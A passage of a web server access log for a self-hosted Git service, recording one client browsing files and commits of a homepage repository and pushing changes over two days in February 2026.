AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 40] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20348] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17480] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9372] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:28:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 5528] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:32 +0000] - 301 301 - GET https git.hanmocnn.co.kr "/favicon.ico" [Client 222.117.41.51] [Length 58] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/branch/main/html/assets/js/script.js" -[17/Feb/2026:22:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 19184] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:28:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 22298] [Gzip 8.82] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 19183] [Gzip 5.18] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html%2Fassets%2Fjs%2Fscript.js" [Client 222.117.41.51] [Length 27041] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/js/script.js" [Client 222.117.41.51] [Length 13746] [Gzip 4.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 20154] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:29:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20333] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17466] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets?sub_path=" [Client 222.117.41.51] [Length 4334] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets?only_content=true" [Client 222.117.41.51] [Length 4034] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/html/assets/js?sub_path=" [Client 222.117.41.51] [Length 1021] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js?only_content=true" [Client 222.117.41.51] [Length 3266] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?only_content=true" [Client 222.117.41.51] [Length 19461] [Gzip 7.31] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js?only_content=true" [Client 222.117.41.51] [Length 9372] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:30:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 23697] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 14] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=split&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 24059] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:31:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 20159] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:32:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1" [Client 222.117.41.51] [Length 24059] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:32:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=unified&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 23696] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[17/Feb/2026:22:32:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/0b107bff0785eda86f81d01f50d0696ea2b0edc1?style=split&whitespace=show-all&show-outdated=" [Client 222.117.41.51] [Length 24058] [Gzip 5.34] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?&last_left=3&last_right=63&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down&&anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136" [Client 222.117.41.51] [Length 2021] [Gzip 11.61] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=23&last_right=83&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 2172] [Gzip 11.01] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=43&last_right=103&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 2266] [Gzip 11.54] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:32:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blob_excerpt/0b107bff0785eda86f81d01f50d0696ea2b0edc1?anchor=diff-21dabcef20d744cfa369e51302df86c5bda213cbK136&last_left=63&last_right=123&left=76&right=136&left_hunk_size=0&right_hunk_size=0&path=html%2Fassets%2Fjs%2Fscript.js&style=split&direction=down" [Client 222.117.41.51] [Length 1105] [Gzip 12.48] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[17/Feb/2026:22:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 27] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:24:47 +0000] - - 301 - GET http git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 166] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:00:24:47 +0000] - 401 401 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 13] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:00:24:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage.git/info/refs?service=git-receive-pack" [Client 222.117.41.51] [Length 235] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:00:24:56 +0000] - 200 200 - POST https git.hanmocnn.co.kr "/windpacer/homepage.git/git-receive-pack" [Client 222.117.41.51] [Length 113] [Gzip -] [Sent-to 192.168.0.250] "git/2.43.0" "-" -[18/Feb/2026:00:25:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/user/login" [Client 222.117.41.51] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/" [Client 222.117.41.51] [Length 11647] [Gzip 4.91] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?count_only=1&uid=1&team_id=undefined&q=&page=1&mode=" [Client 222.117.41.51] [Length 12] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/repo/search?sort=updated&order=desc&uid=1&team_id=undefined&q=&page=1&limit=15&mode=&archived=false" [Client 222.117.41.51] [Length 5594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:25:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage" [Client 222.117.41.51] [Length 20371] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html" [Client 222.117.41.51] [Length 17358] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/tree-view/branch/main/?sub_path=html" [Client 222.117.41.51] [Length 21742] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "-" -[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/events" [Client 222.117.41.51] [Length 0] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36" "https://git.hanmocnn.co.kr/assets/js/eventsource.sharedworker.js?v=1.25.3" -[18/Feb/2026:00:25:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets" [Client 222.117.41.51] [Length 13949] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 (Windows NT 10.0; 